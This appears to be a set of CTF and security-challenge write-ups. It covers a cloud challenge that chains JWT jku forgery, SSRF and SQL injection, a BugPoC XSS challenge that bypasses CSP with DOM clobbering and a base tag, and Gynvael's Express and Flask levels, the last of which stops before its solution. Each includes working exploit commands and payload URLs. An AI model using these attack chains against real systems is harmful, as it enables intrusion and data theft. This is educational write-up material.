const whitelistedIPRanges = ["127.0.0.1/32","15.193.2.0/24","15.177.82.0/24","122.248.192.0/18","54.169.0.0/16","54.255.0.0/16","52.95.255.32/28","175.41.128.0/18","13.250.0.0/15","64.252.102.0/24","99.77.143.0/24","52.76.128.0/17","64.252.103.0/24","52.74.0.0/16","54.179.0.0/16","52.220.0.0/15","18.142.0.0/15","46.137.192.0/19","46.137.224.0/19","46.51.216.0/21","52.94.248.32/28","54.254.0.0/16","54.151.128.0/17","18.136.0.0/16","13.212.0.0/15","3.5.146.0/23","64.252.104.0/24","18.140.0.0/15","52.95.242.0/24","99.77.161.0/24","3.5.148.0/22","18.138.0.0/15","52.119.205.0/24","52.76.0.0/17","54.251.0.0/16","64.252.105.0/24","3.0.0.0/15","52.77.0.0/16","13.228.0.0/15"];

app.use(bodyParser.urlencoded({ extended: true }));

const authenticateJWT = async(req, res, next) => {
    const authHeader = req.headers.authorization;
    if (authHeader) {
        const authenticationType = authHeader.split(' ')[0];
        const token = authHeader.split(' ')[1];
        if (authenticationType === "Bearer") {
            let usage = req.query.usage;
            let check = await validateUserClaim(usage,token);
            if (check) {
                next();
            }else {
                res.sendStatus(401);
            }
        }else {
            res.sendStatus(401);
        }
    } else {
        res.sendStatus(401);
    }
};

function validateUserInputs(payload){
    // check for special characters
    var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

async function getSummaryReport(){
    const results = await sequelize.query('select sum(contribution_total) from records.contributions', { type: sequelize.QueryTypes.SELECT });
    return results[0];
}

async function validateUserClaim(usage, rawToken) {
    let payload = await verifyToken(rawToken);
    if (payload != null) {
        // Simple RBAC
        // Only allow Admin to pull the results
        if (usage == "custom-report"){
            if (payload.role == "admin") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "user-report"){
            if (payload.role == "user") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "summary-report"){
            if (payload.role == "anonymous") {
                return true;
            } else {
                return false;
            }
        }
    }
    return false;
}

async function verifyToken(rawToken) {
    var decodedToken = jwt.decode(rawToken, {complete: true});
    const provided_jku = url.parse(decodedToken.header.jku);
    if (ipRangeCheck(provided_jku.hostname, whitelistedIPRanges)) {
        const client = jwksClient({
            jwksUri: decodedToken.header.jku,
            timeout: 30000, // Defaults to 30s
        });
        const kid = decodedToken.header.kid;
        let publicKey = await client.getSigningKeyAsync(kid).then(key => {
         return key.getPublicKey();
        }, err => {
            return null;
        });
        try {
            let payload = jwt.verify(rawToken, publicKey);
            return payload;
        } catch (err) {
            return null;
        }
    } else {
        return null;
    }
}

function getAuthenticationToken(username,password) {
    // Wait for dev team to update the user account database
    // user account database should be live in Jan 2020
    // Issue only guest user tokens for now
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'guest', role: 'anonymous' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    return token;
}

app.post('/authenticate', (req, res) => {
    // ignore username and password for now
    // issue only guest jwt token for development
    res.json({"token" : getAuthenticationToken(req.body.username, req.body.password)})
});

app.get('/report', authenticateJWT, async (req, res, next) => {
    let message = {
        "message" : "invalid parameters"
    }
    try {
        if (req.query.usage == "custom-report") {
            if(!validateUserInputs(req.query.contributor_id)) {
                res.json({"results" : await getCustomReport(req.query.contributor_id)});
            } else {
                res.json(message);
            }
        } else if (req.query.usage == "summary-report") {
            res.json({"results" : await getSummaryReport()});
        } else {
            res.json(message);
        }
        next();
    } catch (e) {
        next(e);
    }
    
});

app.listen(80, () => {
    console.log('National Pension Registry API Server running on port 80!');
});

Like the previous application, there are quite a few obvious issues with the code.
Several observations can be made here:

  • There is SQL injection (SQLi) in getCustomReport(), but most special characters are not permitted in the user input
  • Only a request presenting a valid JSON Web Token (JWT) with the admin role in its payload is permitted to execute the custom report
  • There is an /authenticate POST endpoint which issues a JWT for the anonymous role
  • There is a /report GET endpoint which authenticates the JWT and allows executing the report functions
  • The JWT verification fetches the jku (JWK Set URL) header parameter of the token and verifies the JWT using the public key obtained from the jku URL
  • The jku URL is validated against a predefined allow-list, which appears to consist of localhost and AWS IP address ranges
  • There are also hardcoded credentials for the PostgreSQL database hosted on Amazon Relational Database Service (Amazon RDS), accessible via the internal network

Chaining The Exploits

Hosting Our Webserver on AWS

Since we can control the jku in the JWT header, and the accepted IPv4 ranges include AWS IP address ranges, we can simply host a webserver on an Amazon Elastic Compute Cloud (Amazon EC2) instance serving the required prod-public-keys.json file to pass the validation checks against the predefined allow-list of IPv4 address ranges.

For example, if the IPv4 address allocated to our AWS EC2 instance is 3.1.33.7, it resides within the permitted 3.0.0.0/15 subnet.
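
We can sanity-check this with the same ip-range-check package that the target application uses:

const ipRangeCheck = require('ip-range-check');
// 3.1.33.7 falls within the whitelisted 3.0.0.0/15 range
console.log(ipRangeCheck('3.1.33.7', '3.0.0.0/15')); // true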

Signing Our Own JWT Token

Next, we need to sign our own valid JWT token with role set to admin in the JWT payload before we are able to execute a custom report. We can modify the provided National Pension Registry Node.js application to sign our own JWT tokens and also serve the JWT public key:

const jwt = require('jsonwebtoken');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const publicKey = fs.readFileSync('prod-keys/prod-public-keys.json');
const PORT = 8080;
const jku_link = `http://3.1.33.7:${PORT}/prod-public-keys.json`;
const express = require('express');
const app = express();

// Sign and return our own JWT token with role set to admin and jku_link pointing to this server
app.get('/authenticate', (req, res) => {
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'admin', role: 'admin' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    res.end(token);
});

// Serve the JWT public key on this endpoint
app.get('/prod-public-keys.json', (req, res) => {
  res.json(JSON.parse(publicKey));
});

app.listen(PORT, () => {
    console.log(`National Pension Registry API Server running on port ${PORT}!`);
});

Afterwards, we install the dependencies for the application and start the server:

$ npm install jsonwebtoken express
$ node server.js
National Pension Registry API Server running on port 8080!
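
Before wiring everything together, we can verify that the signing server issues tokens as expected (output truncated):

$ curl -s http://localhost:8080/authenticate
eyJhbGciOiJSUzI1NiIs...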

SQL Injection

There is one last hurdle to get past – we also need to perform SQL injection successfully so that we can get the flag.

Let’s start by analysing the regular expression used to validate the user input:

function validateUserInputs(payload){
    // check for special characters
    var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

Seems like we are able to use alphanumeric, whitespace, _, ; and . characters.
At this point, we can kind of guess that the flag must be somewhere in the database, and the flag is likely to be one of the records in the same table queried.

Let’s examine the SQL query too:

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

We can see that the injection point is not in a quoted string. Referencing the permitted characters, we can negate the where condition by doing:

SELECT * from records."contributions" where contributor_id = 1 OR null is null

Since null is null is true, this negates the WHERE condition of contributor_id = 1. Besides that, notice that the function returns only the first record of the query results. Since the query contains no ORDER BY clause, the rows are returned unsorted, which lets us fetch the first record in the records.contributions table. If the flag is not in the first record, we can further use the LIMIT and OFFSET keywords to select a specific record from the table precisely.

For example, to select the first record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 0

Or, to select the second record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 1

And so on.
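
Before sending anything over SSRF, we can also quickly confirm that our injection string passes the input filter, reusing the same regular expression as validateUserInputs():

var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
console.log(format.test('1 or null is null limit 1 offset 0')); // false, so the input is accepted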

Getting Flag

Recall that the Employee Pension Contribution Upload Form application is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/ and the National Pension Registry is accessible at http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/ in the internal network.

Chaining all the exploits together, we use the SSRF on the Employee Pension Contribution Upload Form application to perform SQL injection on the National Pension Registry backend application by running the following curl command on our AWS EC2 instance:

$ curl -X POST 'http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'endpoint=http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'usage=custom-report' \
    --data-urlencode 'contributor_id=1 or null is null limit 1 offset 0' \
    --data-urlencode "token=$(curl -s http://localhost:8080/authenticate)"
{"results":{"contributor_id":7531,"contributor_name":"govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}","contribution_total":9999}}

Finally, we got the flag govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}!

Complete Attack Path

Wow! You’re still here reading this? Thanks for sitting through this entire lengthy walkthrough!

Here’s an overview of the complete attack path for this challenge in case you are interested: Overview of Attack Path

By now, I think it is pretty evident that cloud penetration testing is very arduous and can become messy to the point where it gets confusing even for the tester. :tired_face:

I hope you enjoyed the write-up of this challenge, learnt something new, and can now better identify and relate to the common cloud and web security issues often found in the wild.

Recently, BugPoC announced an XSS challenge sponsored by Amazon on Twitter. It was really fun solving this challenge! :D

The rules are simple:

  • Must alert(origin) showing https://wacky.buggywebsite.com
  • Must bypass Content-Security-Policy (CSP)
  • Must work in latest version of Google Chrome
  • Must provide proof-of-concept exploit using BugPoC (duh!)

Although the XSS challenge started a week ago, I did not have time to work on it. I attempted the challenge only 9 hours before it officially ended, and came up with a good idea on how to craft the solution in about 15 minutes while reading the source code on my phone :joy:

This challenge is fairly simple to solve, but it requires careful observation and a good understanding of the various techniques often used when performing XSS.

Introduction

Visiting the challenge site at https://wacky.buggywebsite.com/, we can see a wacky text generator. I started off by taking a quick look at the JavaScript code loaded by the webpage:

var isChrome = /Chrome/.test(navigator.userAgent) && /Google Inc/.test(navigator.vendor);
if (!isChrome){
  document.body.innerHTML = `
    <h1>Website Only Available in Chrome</h1>
    <p style="text-align:center"> Please visit <a href="https://www.google.com/chrome/">https://www.google.com/chrome/</a> to download Google Chrome if you would like to visit this website</p>.
  `;
}

document.getElementById("txt").onkeyup = function(){
  this.value = this.value.replace(/[&*<>%]/g, '');
};


document.getElementById('btn').onclick = function(){
  val = document.getElementById('txt').value;
  document.getElementById('theIframe').src = '/frame.html?param='+val;
};

We can see that the characters &*<>% are removed from the user input in the <textarea>. On clicking the Make Whacky! button, the page loads an iframe pointing to /frame.html?param=<value>, which looks interesting.

HTML Injection/Reflected XSS

There is an HTML injection/reflected XSS vulnerability at wacky.buggywebsite.com/frame.html in the <title> tag via the param GET parameter.

When visiting https://wacky.buggywebsite.com/frame.html?param=REFLECTED VALUE: </title><a></a><title>, the following HTML is returned in the response body:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>
      REFLECTED VALUE: </title><a></a><title>
    </title>
  ...
  <body>
    <section role="container">
      <div role="main">
        <p class="text" data-action="randomizr">REFLECTED VALUE: &lt;/title&gt;&lt;a&gt;&lt;/a&gt;&lt;title&gt;</p>
  ...

The user input supplied via the param GET parameter is reflected twice in the response – the first occurrence is printed as-is (without any sanitization or encoding), and the second is HTML-entity encoded.

This indicates that it is possible to achieve arbitrary HTML injection (i.e. arbitrary HTML elements can be injected onto the webpage) via the param GET parameter using the first reflected param value.

Note: You need to inject </title> to close the title element first. Browsers treat everything within <title>...</title> as text only and will not render any HTML elements found within the title element.

However, Content-Security-Policy (CSP) header in the HTTP response is set to:

script-src 'nonce-zufpozmbvckj' 'strict-dynamic'; frame-src 'self'; object-src 'none';

The script-src CSP directive disallows inline scripts that do not carry the correct nonce value. In other words, reflected XSS payloads such as directly injecting a <script> tag will not achieve JavaScript execution, so we need to exploit vulnerabilities in the existing JavaScript code loaded by the webpage in order to execute arbitrary JavaScript code.

Source Code Analysis

Let’s examine the JavaScript code loaded on /frame.html. The relevant code snippet is shown below:

window.fileIntegrity = window.fileIntegrity || {
    'rfc' : ' https://w3c.github.io/webappsec-subresource-integrity/',
    'algorithm' : 'sha256',
    'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
    'creationtime' : 1602687229
}

// verify we are in an iframe
if (window.name == 'iframe') {
    
    // securely load the frame analytics code
    if (fileIntegrity.value) {
        
        // create a sandboxed iframe
        analyticsFrame = document.createElement('iframe');
        analyticsFrame.setAttribute('sandbox', 'allow-scripts allow-same-origin');
        analyticsFrame.setAttribute('class', 'invisible');
        document.body.appendChild(analyticsFrame);

        // securely add the analytics code into iframe
        script = document.createElement('script');
        script.setAttribute('src', 'files/analytics/js/frame-analytics.js');
        script.setAttribute('integrity', 'sha256-'+fileIntegrity.value);
        script.setAttribute('crossorigin', 'anonymous');
        analyticsFrame.contentDocument.body.appendChild(script);
        
    }

} else {
    document.body.innerHTML = `
    <h1>Error</h1>
    <h2>This page can only be viewed from an iframe.</h2>
    <video width="400" controls>
        <source src="movie.mp4" type="video/mp4">
    </video>`
}

DOM Clobbering

The line window.fileIntegrity = window.fileIntegrity || { ... } is vulnerable to DOM clobbering. It can be observed that fileIntegrity.value is subsequently used as the subresource integrity (SRI) hash value. By injecting an element <input id=fileIntegrity value=hash_here> onto the webpage, it is possible to clobber the fileIntegrity reference with the DOM input node, making fileIntegrity.value resolve to the hash specified in the <input> tag.
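A minimal sketch of the clobbering behaviour, runnable in any browser console (the hash here is a placeholder):

// An <input> whose id matches the global name makes window.fileIntegrity
// resolve to the DOM node – a truthy value, so the `|| { ... }` default
// object is never assigned:
document.body.innerHTML += '<input id="fileIntegrity" value="attacker-hash">';
console.log(window.fileIntegrity);        // the <input> element
console.log(window.fileIntegrity.value);  // "attacker-hash"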

Weak Inline Frame Sandbox Restrictions

It can be seen that an iframe is first created and inserted into the DOM. However, the sandbox policy is configured to allow-scripts allow-same-origin. The allow-scripts keyword allows JavaScript execution, and allow-same-origin makes the iframe content keep its normal origin (wacky.buggywebsite.com) instead of a unique opaque origin, so scripts in the sandboxed iframe run with the parent's same-origin privileges.

CSP Bypass

The code after the iframe insertion creates a <script> element which loads a JavaScript file using the relative path files/analytics/js/frame-analytics.js. Looking back at the CSP header, notice that the base-uri directive is missing. This means we can inject a <base> element with its href attribute set to an attacker-controlled domain: when the script is loaded via the relative path files/analytics/js/frame-analytics.js, the file will be fetched from the attacker's domain instead, achieving arbitrary JavaScript execution!
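Here is a quick console sketch of the effect (attacker.example is a placeholder domain):

// Without a base-uri directive, an injected <base> tag changes how every
// relative URL on the page is resolved:
document.head.appendChild(Object.assign(document.createElement('base'), { href: 'https://attacker.example/' }));
var script = document.createElement('script');
script.src = 'files/analytics/js/frame-analytics.js';
console.log(script.src); // https://attacker.example/files/analytics/js/frame-analytics.js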

X-Frame-Options (XFO) Same-origin Bypass

The X-Frame-Options header in the HTTP response is set to sameorigin. This means that we cannot use an external domain to frame wacky.buggywebsite.com/frame.html to satisfy the if (window.name == 'iframe') check.

There are two ways to resolve this issue:

  1. Lure the victim user to an attacker-controlled domain, set window.name, then redirect to the vulnerable page with the XSS payload.
  2. Use the HTML injection vulnerability to inject an iframe that embeds the page itself with the XSS payload (i.e. frame-ception) :sunglasses:

Option (1) is not ideal in most cases since it imposes an additional requirement for a successful XSS attack on a victim user – having to lure the user to an untrusted domain.

As such, I went ahead with option (2). We can use the HTML injection vulnerability to inject an iframe element with its name attribute set to iframe, making the page embed itself so that the check is satisfied within the iframe.

However, there is a caveat to this approach – since the aforesaid check is not satisfied on the parent frame, the document.body.innerHTML = ... in the else branch will execute, replacing the DOM. This may cancel the loading of the iframe on some systems and hence 'prevent' the XSS attack from succeeding, making the attack unreliable.

To address this caveat, we can inject the start of an HTML comment <!-- (without closing it with -->) after the injected HTML elements in the parent frame, causing the browser to treat the rest of the response as an HTML comment and thereby ignore all inline JavaScript code in the remainder of the webpage.

Simulating the Attack

Before we can craft the whole exploit chain, we need an attacker-controlled domain hosting the XSS payload served as a JavaScript file.

To do so, we can use BugPoC's Mock Endpoint Builder and set it to:

Status Code: 200
Response Headers:
{
  "Content-Type": "text/javascript",
  "Access-Control-Allow-Origin": "*"
}

Response Body:
top.alert(origin)

Then, use BugPoC's Flexible Redirector to generate a shorter, nicer URL pointing at the Mock Endpoint for use in our exploit.

In the response header serving the XSS payload, we also need to add Access-Control-Allow-Origin: * to relax Cross-Origin Resource Sharing (CORS) since the JavaScript resource file is loaded via a cross-origin request.

Note: One thing I did not mention earlier is that because the iframe sandbox policy lacks allow-modals, we cannot call alert(origin) directly inside the iframe. We can simply call top.alert(origin) or parent.alert(origin) to trigger the alert on the parent frame instead and complete the challenge.

Chaining Everything Together

Now, it’s finally time to chain everything together and exploit this XSS!

Attacker Domain Hosting XSS Payload JavaScript File:
https://y5152648ynov.redir.bugpoc.ninja

XSS Payload:
top.alert(origin)

SHA-256 Subresource Integrity Hash of XSS Payload JavaScript File:

$ openssl dgst -sha256 -binary <(printf 'top.alert(origin)') | openssl base64 -A
nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU=

Inner Frame URL (HTML Injection + CSP Bypass + DOM Clobbering + Trigger XSS):

/frame.html?param=</title><base href="https://y5152648ynov.redir.bugpoc.ninja"><input id=fileIntegrity name=value value='nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU='><title>

Outer Frame URL (HTML Injection + Load Inner Frame + Comment Out Rest of Webpage):

https://wacky.buggywebsite.com/frame.html?param=</title><iframe src="/frame.html?param=[url-encoded inner frame's param value]" name="iframe"></iframe><!--
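For clarity, here is a sketch of how the two layers of URL encoding fit together (the exact percent-encoding differs slightly from the final URL in the next section, but it decodes to the same payload):

var hash  = 'nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU=';
var inner = '</title><base href="https://y5152648ynov.redir.bugpoc.ninja">' +
            "<input id=fileIntegrity name=value value='" + hash + "'><title>";
// the inner param value is URL-encoded once for the injected iframe's src...
var outer = '</title><iframe src="/frame.html?param=' + encodeURIComponent(inner) +
            '" name="iframe"></iframe><!--';
// ...and the whole outer payload is encoded once more for the address bar:
console.log('https://wacky.buggywebsite.com/frame.html?param=' + encodeURIComponent(outer));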

Solution

Here’s the final solution to achieve XSS on the domain:

https://wacky.buggywebsite.com/frame.html?param=%3C/title%3E%3Ciframe%20src=%22/frame.html?param=%253C%2Ftitle%253E%253Cbase%2520href%3D%2522https%3A%2F%2Fy5152648ynov%2Eredir%2Ebugpoc%2Eninja%2522%253E%253Cinput%2520id%3DfileIntegrity%2520name%3Dvalue%2520value%3D%2527nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU%3D%2527%253E%253Ctitle%253E%22%20name=%22iframe%22%3E%3C/iframe%3E%3C!--

XSS Proof-of-Concept

Here are my solutions to Gynvael Coldwind (@gynvael)’s web security challenges which I thoroughly enjoyed solving!
These are specially-crafted whitebox challenges designed to test and impart certain skills.
A total of 7 independent challenges were released. Level 0 is a Flask application, whereas Levels 1 through 6 are based on Express.js.

Level 0

Problem

Target: http://challenges.gynvael.stream:5000
https://twitter.com/gynvael/status/1256352469795430407

#!/usr/bin/python3
from flask import Flask, request, Response, render_template_string
from urllib.parse import urlparse
import socket
import os

app = Flask(__name__)
FLAG = os.environ.get('FLAG', "???")

with open("task.py") as f:
  SOURCE = f.read()

@app.route('/secret')
def secret():
  if request.remote_addr != "127.0.0.1":
    return "Access denied!"

  if request.headers.get("X-Secret", "") != "YEAH":
    return "Nope."

  return f"GOOD WORK! Flag is {FLAG}"

@app.route('/')
def index():
  return render_template_string(
      """
      <html>
        <body>
          <h1>URL proxy with language preference!</h1>
          <form action="/fetch" method="POST">
            <p>URL: <input name="url" value="http://gynvael.coldwind.pl/"></p>
            <p>Language code: <input name="lang" value="en-US"></p>
            <p><input type="submit"></p>
          </form>
          <pre>
Task source:

{{ src }}
          </pre>
        </body>
      </html>
      """, src=SOURCE)

@app.route('/fetch', methods=["POST"])
def fetch():
  url = request.form.get("url", "")
  lang = request.form.get("lang", "en-US")

  if not url:
    return "URL must be provided"

  data = fetch_url(url, lang)
  if data is None:
    return "Failed."

  return Response(data, mimetype="text/plain;charset=utf-8")

def fetch_url(url, lang):
  o = urlparse(url)

  req = '\r\n'.join([
    f"GET {o.path} HTTP/1.1",
    f"Host: {o.netloc}",
    f"Connection: close",
    f"Accept-Language: {lang}",
    "",
    ""
  ])

  res = o.netloc.split(':')
  if len(res) == 1:
    host = res[0]
    port = 80
  else:
    host = res[0]
    port = int(res[1])

  data = b""
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(req.encode('utf-8'))
    while True:
      data_part = s.recv(1024)
      if not data_part:
        break
      data += data_part

  return data

if __name__ == "__main__":
  app.run(debug=False, host="0.0.0.0")

Analysis

Looking at the source code provided, we see that there is a /secret route that will give the flag if request.remote_addr == "127.0.0.1" and there is an HTTP header X-Secret: YEAH.

If there are reverse proxies that relay HTTP requests to the Flask application (e.g. Client <-> Reverse Proxy <-> Flask), then request.remote_addr may not be set correctly to the remote client’s IP address. So, let’s do a quick check to test this out:

$ curl 'http://challenges.gynvael.stream:5000/secret' -H 'X-Secret: YEAH'
Access denied!

Clearly, that didn’t work – the request.remote_addr is set correctly on the server end before it reaches the Flask app.

Let’s examine the other functionalities of the application. There is a suspicious /fetch endpoint provided, which invokes the fetch_url(url, lang) function:

def fetch_url(url, lang):
  o = urlparse(url)

  req = '\r\n'.join([
    f"GET {o.path} HTTP/1.1",
    f"Host: {o.netloc}",
    f"Connection: close",
    f"Accept-Language: {lang}",
    "",
    ""
  ])

  res = o.netloc.split(':')
  if len(res) == 1:
    host = res[0]
    port = 80
  else:
    host = res[0]
    port = int(res[1])

  data = b""
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(req.encode('utf-8'))
    while True:
      data_part = s.recv(1024)
      if not data_part:
        break
      data += data_part

  return data

Here, we can see that the URL is parsed, and the hierarchical path (o.path) and network location (o.netloc) are extracted and used alongside the lang parameter to build a raw HTTP request to the host and port specified in the network location part.

Clearly, there is a server-side request forgery (SSRF) vulnerability, since we can establish a raw socket connection to any host and port, and we have some control over the data to be sent!

Let’s check that we are able to reach the /secret endpoint with this SSRF vulnerability and pass the request.remote_addr == "127.0.0.1" check:

$ curl 'http://challenges.gynvael.stream:5000/fetch' -d 'url=http://127.0.0.1:5000/secret'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Fri, 3 May 2020 09:01:05 GMT

Nope.

Great! Since we are no longer getting the Access denied! error message, we have successfully passed the check.

The last piece of the puzzle is figuring out how to set the X-Secret: YEAH HTTP header. Remember the lang parameter? It turns out it is not sanitized either, so we can inject \r\n to terminate the Accept-Language header and inject arbitrary HTTP headers (or even entire requests)!
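Based on the f-strings in fetch_url(), the raw request reaching 127.0.0.1:5000 should look roughly like this (reconstructed from the code, not captured):

GET /secret HTTP/1.1
Host: 127.0.0.1:5000
Connection: close
Accept-Language: 
X-Secret: YEAH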

Solution

$ curl 'http://challenges.gynvael.stream:5000/fetch' -d 'url=http://127.0.0.1:5000/secret' -d 'lang=%0d%0aX-Secret: YEAH'

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 42
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Fri, 3 May 2020 09:01:17 GMT

GOOD WORK! Flag is CTF{ThesePeskyNewLines}

Flag:: CTF{ThesePeskyNewLines}


Level 1

Problem

Target: http://challenges.gynvael.stream:5001
https://twitter.com/gynvael/status/1264653010111729664

const express = require('express')
const fs = require('fs')

const PORT = 5001
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync('app.js')

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 1\n\n")

  if (!('secret' in req.query)) {
    res.end(SOURCE)
    return
  }

  if (req.query.secret.length > 5) {
    res.end("I don't allow it.")
    return
  }

  if (req.query.secret != "GIVEmeTHEflagNOW") {
    res.end("Wrong secret.")
    return
  }

  res.end(FLAG)
})

app.listen(PORT, () => {
  console.log(`Example app listening at port ${PORT}`)
})

Analysis

In Express, req.query.* accepts and parses query string parameters into either strings, arrays or objects.

If an array is supplied, its toString() returns a string of the array values separated by commas. Furthermore, an array has a length property giving the number of elements:

> ['GIVEmeTHEflagNOW'].toString()
'GIVEmeTHEflagNOW'

> ['GIVEmeTHEflagNOW'].length
1
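The same behaviour can be reproduced with the qs module, which Express's default ('extended') query parser uses under the hood:

// qs turns bracketed query string parameters into arrays:
const qs = require('qs')
console.log(qs.parse('secret[]=GIVEmeTHEflagNOW'))
// { secret: [ 'GIVEmeTHEflagNOW' ] }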

Solution

As such, we can send a secret query string parameter as an array with the constant string as its value to pass the checks and obtain the flag:

$ curl 'http://challenges.gynvael.stream:5001/?secret[]=GIVEmeTHEflagNOW'
Level 1

CTF{SmellsLikePHP}

Flag:: CTF{SmellsLikePHP}


Level 2

Problem

Target: http://challenges.gynvael.stream:5002
https://twitter.com/gynvael/status/1257784735025291265

const express = require('express')
const fs = require('fs')

const PORT = 5002
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync('app.js')

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 2\n\n")

  if (!('X' in req.query)) {
    res.end(SOURCE)
    return
  }

  if (req.query.X.length > 800) {
    const s = JSON.stringify(req.query.X)
    if (s.length > 100) {
      res.end("Go away.")
      return
    }

    try {
      const k = '<' + req.query.X + '>'
      res.end("Close, but no cigar.")
    } catch {
      res.end(FLAG)
    }

  } else {
    res.end("No way.")
    return
  }
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Sometimes, it’s easier to work backwards. Let’s look at where the flag is printed:

try {
  const k = '<' + req.query.X + '>'
  res.end("Close, but no cigar.")
} catch {
  res.end(FLAG)
}

Here, we can see that the flag is printed only when the concatenation '<' + req.query.X + '>' throws an exception.

From the above, we can see that a type conversion is performed on req.query.X to convert it to a string for concatenation.
This means that the toString() method of req.query.X may be invoked.

Recall that in Express, req.query.* accepts and parses query string parameters into either strings, arrays or objects.

In JavaScript, it is possible to override the default toString() inherited from the object’s prototype for arrays and objects:

> obj = { "b" : "c" }
{ b: 'c' }
> obj.toString()
'[object Object]'
> obj.toString = () => "obj.toString() overriden!"
> "" + obj
'obj.toString() overriden!'
> obj.toString()
'obj.toString() overriden!'

> arr = [ "b", "c" ]
[ 'b', 'c' ]
> arr.toString()
'b,c'
> arr.toString = () => "arr.toString() overriden!"
> arr.toString()
'arr.toString() overriden!'
> "" + arr
'arr.toString() overriden!'

Note: This is simply overriding properties (including methods) inherited from the object’s prototype. Do not confuse the above with prototype pollution!

But, if toString is not a function, then we get a TypeError:

> obj.toString = "not a function"
> "" + obj
Uncaught TypeError: Cannot convert object to primitive value

> arr.toString = "not a function too"
> "" + arr
Uncaught TypeError: Cannot convert object to primitive value

So, we can define a custom toString property that is not a function using X[toString]= to trigger the exception and print the flag.
In fact, this issue is raised in the Express documentation, and it is the developers' responsibility to validate user-controlled input before trusting it:

“As req.query’s shape is based on user-controlled input, all properties and values in this object are untrusted and should be validated before trusting. For example, req.query.foo.toString() may fail in multiple ways, for example foo may not be there or may not be a string, and toString may not be a function and instead a string or other user-input.”

We can also use the same trick to satisfy the preceding req.query.X.length > 800 check by setting X[length]=1337, since the string '1337' is coerced to a number for the comparison.
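Here is a sketch of what the query parser produces for such a payload. Note that Express invokes qs with allowPrototypes: true (see express/lib/utils.js), which is what allows a key named toString to be set at all:

const qs = require('qs')
console.log(qs.parse('X[length]=1337&X[toString]=', { allowPrototypes: true }))
// { X: { length: '1337', toString: '' } }
// '1337' > 800 is true after coercion, and '' is not callable,
// so '<' + X + '>' throws a TypeError.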

Solution

$ curl 'http://challenges.gynvael.stream:5002/?X[length]=1337&X[toString]='
Level 2

CTF{WaaayBeyondPHPLikeWTF}

Flag:: CTF{WaaayBeyondPHPLikeWTF}


Level 3

Problem

Target: http://challenges.gynvael.stream:5003
https://twitter.com/gynvael/status/1259087300824305665

// IMPORTANT NOTE:
// The secret flag you need to find is in the path name of this JavaScript file.
// So yes, to solve the task, you just need to find out what's the path name of
// this node.js/express script on the filesystem and that's it.

const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5003
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 3\n\n")
  res.end(SOURCE)
})

app.get('/truecolors/:color', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  const color = ('color' in req.params) ? req.params.color : '???'

  if (color === 'red' || color === 'green' || color === 'blue') {
    res.end('Yes! A true color!')
  } else {
    res.end('Hmm? No.')
  }
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Since the goal is to leak the file path of the JavaScript file, the focus is on finding ways to get an exception returned in the response.

After a quick search on GitHub for throw statements, we see that Express's lib/router/layer.js throws an exception if the parameter value cannot be decoded successfully using decodeURIComponent().
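This is easy to reproduce locally, since the underlying call is just decodeURIComponent() on the route parameter value:

// A lone '%' is a malformed percent-escape and throws:
try {
  decodeURIComponent('%')
} catch (e) {
  console.log(e.name + ': ' + e.message) // URIError: URI malformed
}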

Solution

